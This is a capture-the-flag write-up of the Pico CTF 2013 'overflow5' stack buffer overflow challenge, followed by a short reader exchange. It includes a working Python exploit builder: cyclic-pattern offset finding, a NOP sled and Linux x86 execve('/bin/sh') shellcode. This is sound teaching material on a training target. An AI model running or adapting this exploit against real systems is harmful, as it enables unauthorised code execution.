This time I tried overflow5 from Pico CTF 2013. Below you will find the details...
Let's go:
I started with a small payload (200 bytes):
Small surprise: nothing happened... Recreating the payload:
Checking:
Still nothing... Recreating the payload again:
Now it looks better:
Checking:
Now the memory looks better:
Next, find where to store our NOPs...
...with the shellcode (found on Shell-Storm - thanks!):
And we should be right here:
Cool. :)
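Since the actual commands live in the screenshots, here is the same workflow as an added Python example (my own code, not the post's poc.py): generate a cyclic pattern, map the EIP value gdb prints at the crash back to an offset, overwrite that offset with "BBBB" to confirm it (this is where an EIP of 0x42424242 comes from), and assemble the final NOP sled plus shellcode payload. The 23-byte execve("/bin/sh") shellcode is a standard Linux x86 one standing in for whatever was taken from Shell-Storm, and the return address, payload length and file names are placeholders to be filled in from gdb, not values from the original.

```python
import struct

# Alphabet of the Metasploit pattern_create scheme (Aa0Aa1Aa2...): every
# 4-byte window of the pattern is unique, so the EIP value at the crash
# maps to exactly one offset.
UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"
MAX_PATTERN = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280 bytes

# Standard 23-byte Linux x86 execve("/bin/sh") shellcode.  Assumption: it
# stands in for the Shell-Storm payload the post used, which the text
# does not quote.
SHELLCODE = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)


def cyclic_pattern(length: int) -> bytes:
    """Return the first `length` bytes of the Aa0Aa1Aa2... pattern."""
    if length > MAX_PATTERN:
        raise ValueError("pattern exhausted; extend the alphabet")
    chunks = []
    for u in UPPER:
        for lo in LOWER:
            for d in DIGITS:
                chunks.append(u + lo + d)
                if len(chunks) * 3 >= length:
                    return "".join(chunks).encode()[:length]
    return "".join(chunks).encode()[:length]


def pattern_offset(eip: int, length: int = MAX_PATTERN) -> int:
    """Map the faulting EIP (as gdb prints it, e.g. 0x31614130) to the
    offset in the pattern.  x86 is little-endian, so the register holds
    the reversed byte order of what sat in memory; packing the value
    little-endian gives back the bytes to search for."""
    needle = struct.pack("<I", eip)
    idx = cyclic_pattern(length).find(needle)
    if idx < 0:
        raise ValueError("EIP value %#x is not part of the pattern" % eip)
    return idx


def marker_payload(offset: int, length: int) -> bytes:
    """Same pattern, with 'BBBB' written over the four bytes at `offset`.
    If the offset is right, the next crash reports EIP = 0x42424242."""
    buf = bytearray(cyclic_pattern(length))
    buf[offset:offset + 4] = b"BBBB"
    return bytes(buf)


def build_payload(offset: int, ret_addr: int, shellcode: bytes,
                  length: int, via_argv: bool = True) -> bytes:
    """[junk up to offset][ret_addr][NOP sled][shellcode]

    The sled sits after the saved return address, so ret_addr must point
    into that sled (read the stack in gdb after the crash).  The sled is
    sized so the total length stays fixed and the stack layout does not
    shift between runs.  When the payload travels through argv (the
    `$(cat file)` trick) a NUL byte would cut it off, so that is rejected."""
    packed = struct.pack("<I", ret_addr)
    if via_argv and b"\x00" in packed:
        raise ValueError("return address contains a NUL byte; argv would truncate it")
    head = b"A" * offset + packed
    room = length - len(head)
    if room < len(shellcode):
        raise ValueError("payload too short to hold the shellcode")
    return head + b"\x90" * (room - len(shellcode)) + shellcode


if __name__ == "__main__":
    import sys
    LEN = 300  # placeholder payload length, not from the original post
    # Step 1: write the pattern, run the target on it under gdb, note EIP.
    open("pattern", "wb").write(cyclic_pattern(LEN))
    # Step 2: feed back the EIP gdb printed, e.g. `python poc.py 0x31614130`.
    if len(sys.argv) > 1:
        off = pattern_offset(int(sys.argv[1], 16), LEN)
        print("offset of saved EIP:", off)
        open("marker", "wb").write(marker_payload(off, LEN))
        # Step 3: placeholder address; replace with one inside the sled.
        open("exploit", "wb").write(build_payload(off, 0xBFFFFD40, SHELLCODE, LEN))
```

The pattern itself is NUL-free and printable, so it survives `$(cat pattern)` on the command line; the same is not automatically true of the return address, which is why the check is there.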
See you next time!
Cheers
On screenshot #6, how exactly is the segfault happening at 0x42424242 while your pattern (generated by poc.py) does not contain such a string?
Hi, there was also an 'edit' (via vim poc.py) to generate a `cat 5d` payload. So at this moment I changed it to 42424242. Hope that helps.
Thanks for watching!